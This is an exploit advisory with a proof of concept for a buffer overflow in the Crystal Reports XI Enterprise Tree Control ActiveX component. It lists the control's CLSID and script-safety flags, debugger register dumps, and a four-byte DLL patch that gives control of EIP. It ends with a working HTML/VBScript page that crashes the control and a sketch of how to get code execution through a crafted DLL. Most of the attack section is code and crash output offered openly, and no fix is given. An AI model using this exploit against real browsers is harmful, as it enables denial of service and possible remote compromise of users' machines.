HistoryJan 17, 2008 - 12:00 a.m.

Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow (Denial of Service) (PoC)


Application:  Crystal Reports XI Release 2 (Enterprise Tree Control) Remote BoF/Dos
Versions:     11
Platforms:    Windows XP Professional
Bug:          buffer-overflow
Exploitation: remote
Date:         2007-01-16

Author:       shinnai
              e-mail: shinnai[at]autistici[dot]org


1) Introduction
2) Technical details and bug
3) The Code
4) Fix


1) Introduction

This component is used to visualize on the web reports created with
Crystal Reports


2) Technical details and bug

Name:	EnterpriseControls.dll
CLSID:	{3D58C9F3-7CA5-4C44-9D62-C5B63E059050}
MD5:	179e2dc7f9f6e9d6e0210e89c623fd72

Marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

The problem is a buffer-overflow which occours when you use the
"SelectedSession()" method.
It seems that, during the initialization of the component, a race
condition occours between threads and 4 bytes of the same component
will overwrite EIP.
If you patch these 4 bytes, you can control this register, using
it to jump to a shellcode and execute arbitrary code on user's pc.
For exploiting this vulnerability you only need to create a web
page containing the CLSID and the codebase path to your crafted
These are registers using the original file:
14:59:34.126  pid=1468 tid=1250  EXCEPTION (first-chance)
              Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
              EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
              EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
              ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
              EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
              ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
              EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
              EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                            --> N/A

14:59:34.142  pid=1468 tid=1250  EXCEPTION (unhandled)
              Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
              EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
              EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
              ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
              EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
              ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
              EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
              EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                            --> N/A

We'll find these 4 bytes at this address:
0x000172D8 "28 E9 7D FF"...

using an hex editor to modify to:
0x000172D8 "42 42 42 42"...

we'll have:

C:\Tools>bindiff /c /d EnterpriseControls_patched.dll EnterpriseControls_ori.dll

Different, Left is newer  4 bytes differ
000172D0  87 FF FF FF 83 6C 24 04  .....l$.   87 FF FF FF 83 6C 24 04  .....l$.
000172D8 <42 42 42 42>FF FF 83 6C  BBBB...l  <28 E9 7D FF>FF FF 83 6C  (.}....l
000172E0  24 04 2C E9              $.,.       24 04 2C E9              $.,.    

File Count Summary
   Identical:      0 files
   Near Identical: 0 files
   Different:      1 files
   Left Only:      0 files
   Right Only:     0 files
   Errors:         0 files
   Total:          1 files

Byte Count Summary
   Matched:    4 bytes differ
   Left Only:  0 bytes
   Right Only: 0 bytes
   Total:      4 bytes

and registers values will be:
15:05:38.947  pid=12D4 tid=1240  EXCEPTION (first-chance)
              Exception C0000005 (ACCESS_VIOLATION reading [42424242])
              EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
              EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
              ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
              EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
              ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
              EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
              EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                            --> N/A

15:05:38.978  pid=12D4 tid=1240  EXCEPTION (unhandled)
              Exception C0000005 (ACCESS_VIOLATION reading [42424242])
              EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
              EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
              ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
              ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
              EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
              ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
              EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
              EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                            --> N/A

isn't it fun?
Naturally, EIP overwrite requires that someone uses the crafted dll otherwise
you can just enjoy a crash of tha application.


3) The Code

I will release a public exploit but, this time, no code execution ;-)
Everything I could say is that you can directly inject your shellcode into the dll
or pass an argument to "SelectedSession()" method and then jump to the shellcode.

Poc: Click here for DoS exploit

 <object classid='clsid:3D58C9F3-7CA5-4C44-9D62-C5B63E059050' id='test'></object>
  <script language = 'vbscript'>
   test.SelectedSession = ""


4) Fix

No fix


